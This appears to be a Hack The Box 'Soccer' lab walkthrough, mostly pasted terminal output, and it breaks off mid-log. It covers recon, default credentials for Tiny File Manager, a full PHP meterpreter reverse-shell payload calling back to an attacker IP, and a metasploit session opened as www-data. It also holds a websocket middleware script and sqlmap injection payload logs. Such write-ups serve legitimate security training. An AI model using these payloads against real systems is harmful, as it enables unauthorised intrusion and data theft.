https://app.hackthebox.com/machines/Soccer
短信预约 -IT技能 免费直播动态提醒
https://app.hackthebox.com/machines/Soccer
┌──(kwkl㉿kwkl)-[~]└─$ cat /etc/hosts 1 ⨯127.0.0.1 localhost127.0.1.1 kwkl.kwkl kwkl# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopbackff02::1 ip6-allnodesff02::2 ip6-allrouters10.129.187.153 unika.htb10.129.187.172 thetoppers.htb10.129.187.172 s3.thetoppers.htb#10.129.235.232 megacorp.com##10.10.11.196 stocker.htb10.10.11.196 dev.stocker.htb10.10.11.194 soccer.htb┌──(kwkl㉿kwkl)-[~/桌面/burp]└─$ nmap -A 10.10.11.194 -T4 130 ⨯Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-03 22:46 HKTNmap scan report for 10.10.11.194 (10.10.11.194)Host is up (0.99s latency).Not shown: 997 closed tcp ports (conn-refused)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)80/tcp open http nginx 1.18.0 (Ubuntu)|_http-server-header: nginx/1.18.0 (Ubuntu)9091/tcp open xmltec-xmlmail?| fingerprint-strings: | informix: | HTTP/1.1 400 Bad Request|_ Connection: close1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port9091-TCP:V=7.93%I=7%D=3/3%Time=640208C3%P=x86_64-pc-linux-gnu%r(infSF:ormix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\SF:n\r\n");Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 255.63 seconds ┌──(kwkl㉿kwkl)-[~/桌面/burp]
┌──(kwkl㉿kwkl)-[~]└─$ gobuster dir -u soccer.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt 1 ⨯===============================================================Gobuster v3.2.0-devby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://soccer.htb[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.2.0-dev[+] Timeout: 10s===============================================================2023/03/04 11:51:23 Starting gobuster in directory enumeration mode===============================================================/tiny (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]Progress: 9478 / 87665 (10.81%)^C[!] Keyboard interrupt detected, terminating.===============================================================2023/03/04 12:04:41 Finished===============================================================
search exploit
How to use
Download ZIP with latest version from master branch.
Just copy the tinyfilemanager.php to your webspace - thats all 😃 You can also change the file name from “tinyfilemanager.php” to something else, you know what i meant for.
Default username/password: admin/admin@123 and user/12345.
⚠️ Warning: Please set your own username and password in $auth_users before use. password is encrypted with password_hash(). to generate new password hash here
To enable/disable authentication set $use_auth to true or false.
ℹ️ Add your own configuration file config.php in the same folder to use as additional configuration file.
ℹ️ To work offline without CDN resources, use offline branch
Try username password
Try user/12345.
Try admin/admin@123
Tiny File Manager 2.4.3
have upload file privilege
search exploit:
generous the horse
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]└─$ cat ~/shell.php 1 ⨯ error_reporting(0); $ip = '10.10.16.9'; $port = 5555; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die(); ┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=5555 -o shell.php
──(kwkl㉿kwkl)-[~]└─$ msfconsole ___ ____ ,-"" `. < HONK > ,' _ e )`-._ / ---- / ,' `-._<.===-' / / / ; _ / ; (`._ _.-"" ""--..__,' | <_ `-"" \ <`- : (__ <__. ; `-. '-.__. _.' / \ `-.__,-' _,' `._ , /__,-' ""._\__,'< <____ | | `----.`. | | \ `. ; |___ \-`` \ --< `.`.< `-' =[ metasploit v6.2.26-dev ]+ -- --=[ 2265 exploits - 1189 auxiliary - 404 post ]+ -- --=[ 951 payloads - 45 encoders - 11 nops ]+ -- --=[ 9 evasion ]Metasploit tip: View advanced module options with advancedMetasploit Documentation: https://docs.metasploit.com/msf6 > search handlerMatching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) 1 exploit/linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation 2 exploit/linux/local/abrt_sosreport_priv_esc 2015-11-23 excellent Yes ABRT sosreport Privilege Escalation 3 exploit/windows/misc/cve_2022_28381_allmediaserver_bof 2022-04-01 good No ALLMediaServer 1.6 SEH Buffer Overflow 4 exploit/windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow 5 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence 6 exploit/linux/http/accellion_fta_getstatus_oauth 2015-07-10 excellent Yes Accellion FTA getStatus verify_oauth_token Command Execution 7 exploit/windows/misc/achat_bof 2014-12-18 normal No Achat Unicode SEH Buffer Overflow 8 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass 9 auxiliary/scanner/http/apache_activemq_traversal normal No Apache ActiveMQ Directory Traversal 10 auxiliary/scanner/http/apache_activemq_source_disclosure normal No Apache ActiveMQ JSP Files Source Disclosure 11 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner 12 exploit/linux/local/apport_abrt_chroot_priv_esc 2015-03-31 excellent Yes Apport / ABRT chroot Privilege Escalation 13 exploit/windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell 14 exploit/windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow 15 exploit/linux/local/bash_profile_persistence 1989-06-08 normal No Bash Profile Persistence 16 exploit/freebsd/misc/citrix_netscaler_soap_bof 2014-09-22 normal Yes Citrix NetScaler SOAP Handler Remote Code Execution 17 exploit/windows/misc/stream_down_bof 2011-12-27 good No CoCSoft StreamDown 6.8.0 Buffer Overflow 18 exploit/windows/fileformat/cyberlink_lpp_bof 2017-09-23 normal No CyberLink LabelPrint 2.5 Stack Buffer Overflow 19 exploit/windows/fileformat/cyberlink_p2g_bof 2011-09-12 great No CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit 20 exploit/linux/http/dlink_hnap_bof 2014-05-15 normal Yes D-Link HNAP Request Remote Buffer Overflow 21 exploit/linux/http/dlink_dspw215_info_cgi_bof 2014-05-22 normal Yes D-Link info.cgi POST Request Buffer Overflow 22 exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation 23 exploit/windows/browser/exodus 2018-01-25 manual No Exodus Wallet (ElectronJS Framework) remote Code Execution 24 exploit/windows/ftp/ftpsynch_list_reply 2010-10-12 good No FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow 25 exploit/windows/ftp/ftpgetter_pwd_reply 2010-10-12 good No FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD) 26 exploit/windows/ftp/ftpshell51_pwd_reply 2010-10-12 good No FTPShell 5.1 Stack Buffer Overflow 27 exploit/windows/fileformat/foxit_title_bof 2010-11-13 great No Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 28 exploit/freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow 29 exploit/windows/ftp/gekkomgr_list_reply 2010-10-12 good No Gekko Manager FTP Client Stack Buffer Overflow 30 exploit/multi/handler manual No Generic Payload Handler 31 exploit/windows/misc/hp_dataprotector_new_folder 2012-03-12 normal No HP Data Protector Create New Folder Buffer Overflow 32 exploit/multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution 33 exploit/windows/browser/notes_handler_cmdinject 2012-06-18 excellent No IBM Lotus Notes Client URL Handler Command Injection 34 auxiliary/dos/misc/ibm_tsm_dos 2015-12-15 normal No IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service 35 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow 36 exploit/linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow 37 exploit/windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow 38 exploit/windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution 39 exploit/windows/browser/ms13_055_canchor 2013-07-09 normal No MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free 40 exploit/windows/browser/ms13_059_cflatmarkuppointer 2013-06-27 normal No MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free 41 exploit/windows/browser/ms13_069_caret 2013-09-10 normal No MS13-069 Microsoft Internet Explorer CCaret Use-After-Free 42 exploit/windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free 43 exploit/windows/browser/ie_setmousecapture_uaf 2013-09-17 normal No MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free 44 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution 45 exploit/windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good No Magix Musik Maker 16 .mmm Stack Buffer Overflow 46 auxiliary/gather/eventlog_cred_disclosure 2014-11-05 normal No ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure 47 exploit/multi/http/maracms_upload_exec 2020-08-31 excellent Yes MaraCMS Arbitrary PHP File Upload 48 exploit/unix/webapp/guestbook_ssi_exec 1999-11-05 excellent No Matt Wright guestbook.pl Arbitrary Command Execution 49 auxiliary/dos/http/metasploit_httphandler_dos 2019-09-04 normal No Metasploit HTTP(S) handler DoS 50 exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution 51 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution 52 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution 53 exploit/linux/http/netgear_readynas_exec 2013-07-12 manual Yes NETGEAR ReadyNAS Perl Code Evaluation 54 auxiliary/server/dns/native_server normal No Native DNS Server (Example) 55 exploit/windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great No Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 56 exploit/windows/ftp/odin_list_reply2010-10-12 good No Odin Secure FTP 4.1 Stack Buffer Overflow (LIST) 57 exploit/windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal 58 exploit/windows/http/integard_password_bof 2010-09-07 great No Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow 59 exploit/linux/http/raidsonic_nas_ib5220_exec_noauth 2013-02-04 manual No Raidsonic NAS Devices Unauthenticated Remote Command Execution 60 exploit/windows/local/razer_zwopenprocess 2017-03-22 normal Yes Razer Synapse rzpnk.sys ZwOpenProcess 61 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good Yes Rconfig 3.x Chained Remote Code Execution 62 auxiliary/dos/http/webrick_regex 2008-08-08 normal No Ruby WEBrick::HTTP::DefaultFileHandler DoS 63 exploit/osx/browser/safari_user_assisted_download_launch 2014-03-10 manual No Safari User-Assisted Download and Run Attack 64 exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE 65 exploit/windows/ftp/scriptftp_list 2011-10-12 good No ScriptFTP LIST Remote Buffer Overflow 66 exploit/windows/ftp/seagull_list_reply 2010-10-12 good No Seagull FTP v3.3 Build 409 Stack Buffer Overflow 67 exploit/windows/http/sitecore_xp_cve_2021_42237 2021-11-02 excellent Yes Sitecore Experience Platform (XP) PreAuth Deserialization RCE 68 auxiliary/dos/http/squid_range_dos 2021-05-27 normal No Squid Proxy Range Header DoS 69 auxiliary/server/teamviewer_uri_smb_redirect normal No TeamViewer Unquoted URI Handler SMB Redirect 70 exploit/linux/http/trendmicro_websecurity_exec 2020-06-10 excellent Yes Trend Micro Web Security (Virtual Appliance) Remote Code Execution 71 exploit/windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good No TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow 72 exploit/windows/http/ultraminihttp_bof 2013-07-10 normal No Ultra Mini HTTPD Stack Buffer Overflow 73 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) 74 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) 75 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent Yes WordPress AIT CSV Import Export Unauthenticated Remote Code Execution 76 exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload 77 auxiliary/admin/http/wp_gdpr_compliance_privesc 2018-11-08 normal Yes WordPress WP GDPR Compliance Plugin Privilege Escalation 78 exploit/windows/fileformat/xion_m3u_sehbof 2010-11-23 great No Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow 79 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence 80 exploit/windows/fileformat/zahir_enterprise_plus_csv 2018-09-28 normal No Zahir Enterprise Plus 6 Stack Buffer Overflow 81 exploit/linux/http/zyxel_ztp_rce 2022-04-28 excellent Yes Zyxel Firewall ZTP Unauthenticated Command Injection 82 exploit/unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload 83 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent Yes blueman set_dhcp_handler D-Bus Privilege EscalationInteract with a module by name or index. For example info 83, use 83 or use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_escmsf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload php/set payload php/bind_perl set payload php/execset payload php/meterpreter/reverse_tcpset payload php/bind_perl_ipv6 set payload php/meterpreter/bind_tcp set payload php/meterpreter/reverse_tcp_uuidset payload php/bind_php set payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter_reverse_tcpset payload php/bind_php_ipv6 set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/reverse_perlset payload php/download_exec set payload php/meterpreter/bind_tcp_uuid set payload php/reverse_phpmsf6 exploit(multi/handler) > set payload php/meterpreter/set payload php/meterpreter/bind_tcp set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/meterpreter/reverse_tcpset payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter/bind_tcp_uuid set payload php/meterpreter/reverse_tcp_uuidmsf6 exploit(multi/handler) > set payload php/meterpreter/set payload php/meterpreter/bind_tcp set payload php/meterpreter/bind_tcp_ipv6_uuid set payload php/meterpreter/reverse_tcpset payload php/meterpreter/bind_tcp_ipv6 set payload php/meterpreter/bind_tcp_uuid set payload php/meterpreter/reverse_tcp_uuidmsf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcppayload => php/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 10.10.16.9lhost => 10.10.16.9msf6 exploit(multi/handler) > set lport 5555lport => 5555msf6 exploit(multi/handler) > ls[*] exec: ls allowed.userlist Cookies google-chrome-stable_current_amd64.deb logs raw-md5 TransportSecurity 公共 allowed.userlist.passwd Cookies-journal GPUCache machineid respondehash1.txt User 圖片 Backups Crashpad hash.txt module13 respondehash.txt vaccinhash.txt 影片 blob_storage ctf4 HAsIXULC.html msf 'Service Worker' vpy3.9 文件 Cache ctf8 HODL 'Network Persistent State' 'Session Storage' vulhub 桌面 CachedData databases JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar paused.conf shell.php WebStorage 模板 CachedExtensions Dictionaries languagepacks.json Preferences shell.sh worknotes.txt 音樂'Code Cache' flag.txt 'Local Storage' prod.dtsConfig solve_pow.py 下载msf6 exploit(multi/handler) > show optionsModule options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.16.9 yes The listen address (an interface may be specified) LPORT 5555 yes The listen portExploit target: Id Name -- ---- 0 Wildcard TargetView the full module info with the info, or info -d command.msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.10.16.9:5555 [*] Sending stage (39927 bytes) to 10.10.11.194[*] Meterpreter session 1 opened (10.10.16.9:5555 -> 10.10.11.194:52842) at 2023-03-05 11:12:21 +0800meterpreter > sysinfoComputer : soccerOS : Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64Meterpreter : php/linuxmeterpreter > id[-] Unknown command: idmeterpreter > id[-] Unknown command: idmeterpreter > os-shell[-] Unknown command: os-shellmeterpreter > ?Core Commands============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel detach Detach the meterpreter session (for http/https) disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module secure (Re)Negotiate TLV packet encryption on the session sessions Quickly switch to another session use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channelStdapi: File system Commands============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file chmod Change the permissions of a file cp Copy source to destination del Delete the specified file dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcat Read the contents of a local file to the screen lcd Change local working directory lls List local files lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directoryStdapi: Networking Commands=========================== Command Description ------- ----------- portfwd Forward a local port to a remote service resolve Resolve a set of host names on the targetStdapi: System Commands======================= Command Description ------- ----------- execute Execute a command getenv Get one or more environment variable values getpid Get the current process identifier getuid Get the user that the server is running as kill Terminate a process localtime Displays the target system local date and time pgrep Filter processes by name pkill Terminate processes by name ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OSStdapi: Audio Output Commands============================= Command Description ------- ----------- play play a waveform audio file (.wav) on the target systemmeterpreter > shellProcess 1689 created.Channel 0 created.iduid=33(www-data) gid=33(www-data) groups=33(www-data)lsshell.phpss -lntupNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=1127,fd=6),("nginx",pid=1126,fd=6)) tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 511 127.0.0.1:3000 0.0.0.0:* tcp LISTEN 0 511 0.0.0.0:9091 0.0.0.0:* tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:* tcp LISTEN 0 511 [::]:80 [::]:* users:(("nginx",pid=1127,fd=7),("nginx",pid=1126,fd=7)) tcp LISTEN 0 128 [::]:22 [::]:* cat /etc/nginx.confcat: /etc/nginx.conf: No such file or directorycat /etc/hosts127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb127.0.1.1 ubuntu-focal ubuntu-focalfind / -type d -name dstat 2>/dev/null/usr/share/doc/dstat/usr/share/dstat/usr/local/share/dstatiduid=33(www-data) gid=33(www-data) groups=33(www-data)iduid=33(www-data) gid=33(www-data) groups=33(www-data)cd /usr/local/share/dstat /bin/sh: 10: cd: can't cd to /usr/local/share/dstatlsiduid=33(www-data) gid=33(www-data) groups=33(www-data)lsidpwdTerminate channel 0? [y/N] npwdpwdTerminate channel 0? [y/N] nTerminate channel 0? [y/N] nfind soc-player.soccer.htb
[sudo] kwkl 的密码: ┌──(kwkl㉿kwkl)-[~]└─$ cat /etc/hosts 127.0.0.1 localhost127.0.1.1 kwkl.kwkl kwkl# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopbackff02::1 ip6-allnodesff02::2 ip6-allrouters10.129.187.153 unika.htb10.129.187.172 thetoppers.htb10.129.187.172 s3.thetoppers.htb#10.129.235.232 megacorp.com##10.10.11.196 stocker.htb10.10.11.196 dev.stocker.htb10.10.11.194 soccer.htb10.10.11.194 soc-player.soccer.htb
try sqlmap
try sqlmap
sign up & login
try ws middle ware
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]└─$ cat ws.py from http.server import SimpleHTTPRequestHandlerfrom socketserver import TCPServerfrom urllib.parse import unquote, urlparsefrom websocket import create_connectionws_server = "ws://soc-player.soccer.htb:9091/"def send_ws(payload): ws = create_connection(ws_server) # If the server returns a response on connect, use below line #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here # For our case, format the payload in JSON message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure data = '{"id":"%s"}' % message ws.send(data) resp = ws.recv() ws.close() if resp: return resp else: return ''def middleware_server(host_port,content_type="text/plain"): class CustomHandler(SimpleHTTPRequestHandler): def do_GET(self) -> None: self.send_response(200) try: payload = urlparse(self.path).query.split('=',1)[1] except IndexError: payload = False if payload: content = send_ws(payload) else: content = 'No parameters specified!' self.send_header("Content-type", content_type) self.end_headers() self.wfile.write(content.encode()) return class _TCPServer(TCPServer): allow_reuse_address = True httpd = _TCPServer(host_port, CustomHandler) httpd.serve_forever()print("[+] Starting MiddleWare Server")print("[+] Send payloads in http://localhost:8081/?id=*")try: middleware_server(('0.0.0.0',8081))except KeyboardInterrupt: pass┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]└─$ python3 ws.py[+] Starting MiddleWare Server[+] Send payloads in http://localhost:8081/?id=*127.0.0.1 - - [05/Mar/2023 11:39:06] "GET /?id=1 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:39:09] "GET /?id=1&ZLTO=7210%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:39:15] "GET /?id=1 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:39:26] "GET /?id=1%2C%27%28%29%2C%28.%22%29%2C HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:39:31] "GET /?id=1%27RWoWuw%3C%27%22%3EgHqXRX HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:39:35] "GET /?id=1%29%20AND%207838%3D9274%20AND%20%289743%3D9743 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:39:40] "GET /?id=1%20AND%207762%3D3250 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:39:46] "GET /?id=1%20AND%204911%3D9784--%20GhqF HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:02] "GET /?id=1%27%29%20AND%204484%3D4965%20AND%20%28%27RbjR%27%3D%27RbjR HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:06] "GET /?id=1%27%20AND%203834%3D5208%20AND%20%27VqnP%27%3D%27VqnP HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:10] "GET /?id=%28SELECT%20%28CASE%20WHEN%20%281185%3D6285%29%20THEN%201%20ELSE%20%28SELECT%206285%20UNION%20SELECT%206895%29%20END%29%29 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:15] "GET /?id=1%29%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29%20AND%20%286667%3D6667 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:21] "GET /?id=1%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:31] "GET /?id=1%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29--%20VmOL HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:36] "GET /?id=1%27%29%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29%20AND%20%28%27vgZl%27%3D%27vgZl HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:43] "GET /?id=1%27%20AND%20EXTRACTVALUE%289909%2CCONCAT%280x5c%2C0x716b627a71%2C%28SELECT%20%28ELT%289909%3D9909%2C1%29%29%29%2C0x71716a6a71%29%29%20AND%20%27FMfq%27%3D%27FMfq HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:50] "GET /?id=1%29%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%284381%3D4381 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:40:54] "GET /?id=1%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:00] "GET /?id=1%20AND%207941%3DCAST%28%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287941%3D7941%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20pXHb HTTP/1.1" 200 -127.0.0.1 - - [05/Mar/2023 11:41:08] "GET 